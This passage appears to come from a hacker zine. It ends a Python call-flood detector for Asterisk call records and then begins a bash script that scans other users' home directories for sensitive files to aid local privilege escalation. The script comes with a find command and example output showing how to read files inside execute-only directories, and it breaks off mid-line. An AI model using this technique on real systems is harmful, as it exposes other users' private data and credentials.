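    """Parse the simplified CDR format above into a list of dicts."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, billsec, disposition = line.split(",")
        records.append({"ts": int(ts), "src": src, "dst": dst,
                        "billsec": int(billsec), "disposition": disposition})
    return records


def peak_rate(timestamps, window):
    """Largest number of calls that started within any `window`-second span."""
    ts = sorted(timestamps)
    best = left = 0
    for right in range(len(ts)):
        while ts[right] - ts[left] > window:
            left += 1
        best = max(best, right - left + 1)
    return best


def analyze_cdr(text, window=60, rate=10):
    """Per called number: call count, peak calls per window, answered-but-zero-
    billsec count, structurally invalid caller IDs, and a flood verdict."""
    by_dst = defaultdict(list)
    for rec in parse_cdr(text):
        by_dst[rec["dst"]].append(rec)
    report = {}
    for dst, recs in by_dst.items():
        peak = peak_rate([r["ts"] for r in recs], window)
        answered_zero = sum(1 for r in recs
                            if r["disposition"] == "ANSWERED" and r["billsec"] == 0)
        invalid = sum(1 for r in recs if not nanp_plausible(r["src"]))
        report[dst] = {
            "calls": len(recs),
            "peak_per_window": peak,
            "answered_zero_billsec": answered_zero,
            "invalid_cid": invalid,
            "flood": peak >= rate,
        }
    return report


if __name__ == "__main__":
    for dst, stats in analyze_cdr(SAMPLE_CDR).items():
        print(dst, stats)
```

With real Asterisk CDRs, map the src, dst, billsec and disposition columns of the cdr-csv output onto the same fields; the rate check is what matters operationally, and the zero-billsec and invalid-caller-ID counts are corroboration, since a legitimate burst (a radio promotion, say) produces real conversations and real numbers.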
[==================================================================================================]

-=[ 0x04 duper's Code Corner
-=[ Author: duper
-=[ Website: http://projects.ext.haxnet.org/~super/

#!/bin/bash
#
#  _   _   _   _   _   _   _     _   _   _   _     _   _   _   _   _   _
# / \ / \ / \ / \ / \ / \ / \   / \ / \ / \ / \   / \ / \ / \ / \ / \ / \
#( d | u | p | e | r | ' | s ) ( c | o | d | e ) ( c | o | r | n | e | r )
# \_/ \_/ \_/ \_/ \_/ \_/ \_/   \_/ \_/ \_/ \_/   \_/ \_/ \_/ \_/ \_/ \_/
#
#
# scan-home-dirs.bash by duper for GNY
# Fri Oct 1 04:57:00 UTC 2010
#
# A bash script that scans home directories and other filesystem directory
# hierarchies for sensitive data that can help with local privilege
# escalation attacks.
#
# NOTE: this script requires GNU parallel as a prerequisite. You may need to
# install the tarball from http://gnu.org/software/parallel first.
#
# Feel free to add your own common directories, subdirectories, "hidden"
# dot-files and such to scan. The regular expression for matching sensitive data
# can be easily configured as well.
#
# This is the command I use for finding new filenames to add to the script:
#
#   nice -2 find / \( -type f -or -type d \) -and \( -perm /0001 -or \
#     -perm /0002 \) -and \( -not -iname "/proc/*" -and -name ".*" -or \
#     -iname "*.cf" -or -iname "*.conf" \) -and -not -empty \
#     -fls /tmp/find.$ 2>/dev/null
#
# ..obviously the output goes to /tmp. This script essentially allows you to
# discover data in hidden files within directories that you may not necessarily
# have read access to -- If you've ever seen dirbx.c, a brute force executable
# directory lister by dmuz and methodic, then you probably understand this
# concept already. However, the problem with dirbx is that it takes too long
# to generate all the filename combinations. Therefore, scan-home-dirs (this
# script) just uses well-known file and directory names to expedite the process.
#
# If you're not familiar with dirbx, I'm including an excerpt of the mailing
# list message from whence it first appeared:
#
#   "AngryPacket Security is proud to announce the release of dirbx! dirbx is
#    a brute force executable directory and file enumerator. It could prove
#    to be very useful in local pen-tests where you don't have UID 0 and some
#    directories have "--x" permissions."
#
# So in other words, you're going to get `Permission denied' if you try to run
# /bin/ls on a directory with only the world execute bit set. Regardless, you
# can still view world readable files inside that directory if you provide
# /bin/cat with a full pathname. For example:
#
#   [super@callisto ~]$ ls -ld /home/whye
#   drwx-----x 13 whye whye 4096 Sep 21 04:35 /home/whye
#   [super@callisto ~]$ ls /home/whye
#   ls: /home/whye: Permission denied
#   [super@callisto ~]$ ls -ld /home/whye/.bashrc
#   -rw-r--r-- 1 whye whye 225 Mar 21  2010 /home/whye/.bashrc
#   [super@callisto ~]$ head -4 /home/whye/.bashrc
#   # .bashrc
#
#   # Source global definitions
#   if [ -f /etc/bashrc ]; then
#   [super@callisto ~]$
#

# Display program banner
echo
echo 'scan-home-dirs.bash by duper for GNY'
echo '===================================='
echo

# First, we'll look through directories that we ARE able to read
declare -a alist=$(ls -altd /home/*/.* | awk '/^d/ {print($9)}' | \
  egrep -v '([.]+)
